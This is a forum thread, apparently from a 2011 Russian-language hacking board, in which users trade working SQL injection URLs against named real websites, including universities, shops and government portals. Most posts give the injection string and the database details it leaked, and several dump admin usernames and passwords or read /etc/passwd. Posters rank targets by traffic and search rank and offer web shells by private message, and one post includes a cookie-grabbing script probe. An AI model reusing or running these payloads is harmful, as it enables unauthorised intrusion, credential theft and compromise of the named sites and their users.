http://www.shopestores.com/subcategory.php?id=-1+union+Select+1,2,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,4,5,6+--+
version: 5.1.53-log
database: shopestores
user: estores@frontstnet.net
+ PR: 2
http://www.nosmoking.ru/images/NSMLOGO.gif
http://www.nosmoking.ru/newsblock.php?action=showcat&catid=-3%20and%201=2%20union%20select%201,2,3,4,5,concat_ ws(char(58),@@version,user(),database()),7,8+--
5.0.77 nsm_news@localhost nsm_news
http://www.catedrasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+ from+usuarios--
http://www.semioticasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+ from+usuarios--
Code:
http://botox.ru/cosmetic/centers/moscow/?view_metro_id=10+uNIOn+sELECT+1,2,3,version%28%29 ,5,6,7,8,9,10%20--
B07OX for everyone, guys!
Yandex TIC 100
Google PageRank 3
PHP:
version:5.0.90
database:u154046
user:u154046@10.8.0.15
========addition==========
Code:
http://beli.ru/tovar/?id=7795+union+select+1,2,3,version%28%29,user%28% 29,6,database%28%29,8,9,10,11,12,13%20--
there is a table with IP addresses
Yandex TIC 0, 4k pages by the way
Google PageRank 3
PHP:
version:5.0.90
database:u22946_2
user:u22946@10.8.0.57
Code:
http://vkka.gov.ua/index.php?id=-1+union+select+1,version(),user(),database(),5,6,7 ,8,9,10,11,12,13,14,15,16,17&page=katalog
5.5.14
vkka_root@localhost
vkka_adv
(CY) 60
(PR) 3
Code:
http://webshop.dgn-thai.net/test/page.php?id=-63+union+all+select+1,concat_ws(0x3a,user(),versio n(),database()),3,4,5,6+--+
webdev@203.170.193.22
5.1.39-community
dgn_blog
Code:
http://passion-wow.com/?news=1+UNION+SELECT+1,concat_ws(0x202f20,user(),v ersion(),database()),3,4,5,6,7+FROM+INFORMATION_SC HEMA.TABLES+--+
5.0.24a-community-nt
root1@127.0.0.1
wownews
HAXTA4OK : "Don't multiply posts; if you were the last one to reply, just edit your post and paste it in there"
winstrool
01.09.2011, 01:50
TIC 140 PR 3
http://www.restcon.ru/index.php/docs1/images/video/images/index.php?section=article&article_id='642'+AND+(version()+like+'%4.0.26%')+a nd+(user()+like+'%restconcaravanru%')+and+(databas e()+like+'%restconcaravanru%')+--+
found by accident:
Code:
http://www.buildcommerce-bg.com/index.php ?option=com_astra&S=4&F=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59 /*
DezMond™
02.09.2011, 17:53
PR8 TIC300
http://www.uni-potsdam.de/statoek/literatur_abfrage.php?eingabe=Details&id=-195+union+select+1,2,3,4,5,6,7,8,LOAD_FILE(0x2F657 4632F706173737764)+--+
Mickey House
02.09.2011, 18:01
Code:
http://www.st-martin.org/reservations/lire/index.php?rubid=9+and+1=0+Union+Select+1,0x4861636 B656420627920494E432E--
Code:
http://www.teledom.fr/sint_maarten/lire/index.php?rubid=6+AND+1=2+UNION+SELECT+0x31,0x4861 636B656420627920494E432E--
Code:
http://www.cinema-tout-ecran.ch/2008/index.php?lan='en&rubID=50+and+1=0+Union+Select+1,2,3,0x4861636B6564 20627920494E432E,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
DezMond™
02.09.2011, 22:27
http://www.arisierung-in-thueringen.uni-jena.de/component/option,com_ownbiblio/Itemid,83/view,ownbiblio/index.php?option=com_ownbiblio&Itemid=83&view=delete&id=168&catid=-42+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
TIC500 PR7
http://www.uni-hannover.de/de/aktuell/online-aktuell/index.php?funktion=archiv&monat=4&jahr=2008&rubrik=-2+union+select+user()+--+
uhimp@luhw3live.uni-hannover.de
Lam3rsha
03.09.2011, 05:07
http://g-baza.ru/spisok.php?lr=561001&hr=3000+union+select+version()
Database Version: 5.0.77-log
Database name: fbaza-1_refer
User name: fbaza-1_refer@91.219.194.13
http://planeta.tspu.ru/?ur=810&ur1=870&ur2=1215+UNION+SELECT+1,2,user(),4,5,6,7,8,9,10,11 ,12,13,14,15--
Version: 5.1.56-log
name: planeta
name: planeta@localhost
http://www.ssa-rss.ru/index.php?page_id=19&id=545+union+select+1,2,3,version(),5,6,7,8
Version: 6.0.7-alpha
name: ssa-rss
name: root@localhost
DezMond™
03.09.2011, 17:10
TIC700 PR9
http://www.univie.ac.at/ANA/php/index3.php?n=-176+union+select+1,2,3,4,5,6,7,'/etc/passwd',9,10,11,12,13,14,15,16,17+--+
pr2
http://www.painton.co.il/page_e.php?id=-107+union+select+1,2,3,4,group_concat(name,0x3a,pa ssward),6,7,8,9,10,11+from+users--
pr2
http://opr.co.il/page_e.php?id=-119+union+select+1,2,3,4,group_concat(name,0x3a,pa ssward),6,7+from+users--
http://net.cncnc.edu.cn/page_r.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--
pr1
http://www.jugendfeuerwehr-kreis-ravensburg.de/page_r.php?id=-4+union+select+1,2,group_concat(name,0x3a,pass),4+ from+zugriff--
admin:
main_r.php?id=10&expand_id=10
http://architect.tbilisi.gov.ge/psite/page_c.php?id=-287+union+select+1,2,3,version()--
Fédération Française de Basketball
http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442"/>alert(document.cookie)
http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,version(),23--
http://www.terrasana.net/page_i.php?id=-45+union+select+1,2,pass,4,5,6,7,8,9,10,11,12+from +ts_admin--
http://www.egilplastics.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3 ,4,5,6,7,8+from+fk_admin--
http://www.hdpe-butt-welding.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3 ,4,5,6,7,8+from+fk_admin--
http://enoveragroup.com/anews.php?id=-9+union+select+group_concat(login,0x3a,password),2 ,3+from+user--
http://www.actupix.net/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a ,pass),7,8,9,10,11,12+from+users--
http://www.burelfc.com/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a ,pass),7,8,9,10,11,12+from+users--
Haven't had a fat one in a while =)
Peoples.Ru
TIC 4600
Pr 3
Traffic ~70-80k visitors
Of which RU traffic 50k
HTML:
http://music.peoples[xD].ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cco ncat_[system]ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2Cuser% 28%29%2C%40%40version_compile_os%29%2C3%2C4%2C5%2C 6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2 C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2 C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2 C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2 C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2 C57%2C58%29%23
P.S. There are a lot of SQL-inj on the other subdomains too, so you don't need to post them. If you upload a shell, be sure to write to me in PM... If you are good at exploiting SQL-inj, PM me too, I have some ideas)
http://vvo.aero/index.php?a=in&views=_eng&date_z=&point=&Itemid=&list=-140+UNION+ALL+SELECT+from+information_schema.table s+whe%20%20re+table_schema=0x68656c6c6f776f725f686 56c6c6f+--
looks like Joomla... but a crazy one!!!
MyGreenLife
09.09.2011, 23:26
http://www.sibyacht.ru/html/index.php?gid=-10+union+select+1,concat(adminlogin,0x3a,adminpass word),3,4,5,6,7+from+admins--+
The info is in the title.
TIC 2000. PR 5.
http://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
5.5.13-log
TIC 850. PR 5.
http://www.kant.ru/show_good1.php?t=alpine_boots+where+1=2+union+sele ct+version%28%29,2,3,4,5,6,7,8,9,0,1,2,1,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7--+
5.1.58
Code:
http://www.ktsk.ru/index.php?id=-1+union+select+1,group_concat%28table_name+separat or+0x3a%29,3,4,5,6,7,8+from+information_schema.tab les+where+table_schema=0x7765626d6f72746f6e5f6b747 36b --
Code:
http://www.horncastlecivic.org.uk/worthies/details.php?id=-1+union+select+1,group_concat%28username,0x3a,pass word%29,3,4,5,6+from+admin%20--
Code:
http://www.yhmag.co.uk/comp_dets.php?id=1+union+select+1,2,group_concat%2 8name,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+L UM_User%20--
Code:
http://www.whoisintown.co.uk/town_stories.php?id=-1+union+select+1,2,3,4,5,group_concat%28username,0 x3a,password%29,7,8,9,10+from+members%20--
Code:
http://www.jimmyeatworldlive.co.uk/demodetails.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11 +--+
TIC 1.5k, PR5. 8k-20k+ traffic
Code:
url:http://www.stroyportal.ru/
document.cookie="cookie_reg=-101 union+select+version()--"
location.reload();
5.5.7-rc-log
phpAdsNew
safe mode: ON Т____Т
whoever needs a shell (though who would need it...) - PM me.
-------------
TIC 90, PR4, 6k+ traffic.
Code:
www.play-today.ru/index.php?productID=39119+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--+
5.1.561
WBS_USER
upd:
(shell given away)
Code:
http://24rus.ru/more.php?UID=73389+or+1+group+by+concat%28version% 28%29,floor%28rand%280%29*2%29%29having+min%280%29 +or+1--+
2k TIC, everybody fap, guys! 191k pages in Yandex
5 PR
sourcec0de
12.09.2011, 19:27
getdota.com
Code:
http://www.getdota.com/app/getmap/
POST:
mirror_id=0&mirror_nr=2&file_name=DotA+v6.72f.w3x&as_zip=0&language=en&map_id=501&language_id=2 and(select min(@:=1)from (select 1 union select 2)k group by concat((select concat_ws(0x3a,user_id,login,pass)from users limit 0,1),@:=@-1))
Code:
http://www.tdgalion.ru/keramogranit.php?sizecol=72+union+select+table_nam e,2,3,4,5,6,7,8+from+information_schema.tables+lim it+0,1--+
user:u259236@10.8.1.61
database:u259236_2
version:5.0.90-log
1100 TIC
5 PR
Code:
http://www.bmsk.ru/news.php?id=-653+union+select+1,2,3,4,group_concat%28version%28 %29,0x3a,user%28%29,0x3a,database%28%29%29,6,7,8,9 ,10,11--
output is in the page source
Code:
http://wmhistory.com/passport.php?id=-11638+union+select+1,version(),3,4,5,6--
Version: 5.0.51a-24+lenny5
http://www.naturaleshop.gr/prod.php?id=1+union+select+null,group_concat(usern ame,0x3a,password),3,4,5,6,7,8,9,10,11+from+Accoun ts--
http://petguide.gr/prod.php?id=-412+union+select+null,group_concat(username,0x3a,p assword),3,4,5,6,7,8,9,10,11,13,13,14,15+from+Acco unts--
http://www.petshopmarket.gr/prod.php?id=1+union+select+null,group_concat(usern ame,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15 +from+Accounts--
http://torrent.hacker.lv/download.php?id=8617&name=Gorod.vorov.2010.D.HDRip.torrent
found by Boobby (Taimas)
read the domain
t3cHn0iD
14.09.2011, 12:22
http://www.seasideheightstourism.com/single_event.php?id=84+and+1=0+union+select+1,conc at_ws(0x3a,username,password),3,4+from+member_logi n--
http://sms.dovrecka.sk/sms.php?id=3964+and+1=0+union+select+1,2,3,concat_ ws(0x3a,version(),user()),5,6,7,8,9--
OxoTnik said:
found by Boobby (Taimas)
read the domain
Don't go off-topic
http://slv.ufanet.ru/component/ufanetdvbclist/?task=package&package=76&pid=0&cid=30
t3cHn0iD said:
Don't go off-topic
don't be dense
1k traffic
Code:
http://baraholka43.ru/page.php?page=125+union+select+1,version()--+
5.0.51a-24+lenny2+spu1-log
______________
4k+ traffic, PR5, TIC450.
Code:
http://www.gmsn.ru/page.php?rub=news&id=-254'+union+select+1,2,(select unhex(hex(version()))),4,5,6,7,8--+
4.1.16-1.gms
______________
traffic 1k+, TIC200, p4.
Code:
http://www.mozhaysk.ru/index.php?tp=-bndom%27+union+all+select+1,2,version(),4--+
output is in the source code.
5.1.50-log
t3cHn0iD
16.09.2011, 07:30
OxoTnik said:
http://slv.ufanet.ru/component/ufanetdvbclist/?task=package&package=76&pid=0&cid=30
don't be dense
What you've got there is just a path disclosure >_